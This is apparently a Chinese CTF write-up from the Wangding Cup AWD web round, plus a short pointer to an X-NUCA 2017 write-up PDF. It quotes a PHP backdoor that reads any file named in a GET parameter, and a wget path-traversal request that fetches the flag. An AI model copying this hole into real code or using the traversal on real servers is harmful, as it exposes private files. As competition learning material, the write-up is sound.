网鼎杯线下AWD【WEB】
不得不说AWD对WEB狗越来越不友好了 Down下网站源码后上Seay源代码审计工具直接自动审计一波发现预留后门 路径/sites/all/modules/avatar_uploader/lib/demo/view.php <?php$file = $_GET['file'];echo file_get_contents("uploadDir/$file");exit; 直接构造POC:wget http://ip:5072/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../flag即可获取目标机上flag
X-NUCA CTF 1~3 Write-Up
2017年XNUCA Writeup 第一次玩这个,直接PDF文件吧第四关加了个WAF过不去 mmp。。。。1~3关WRITEUP 下载PDF
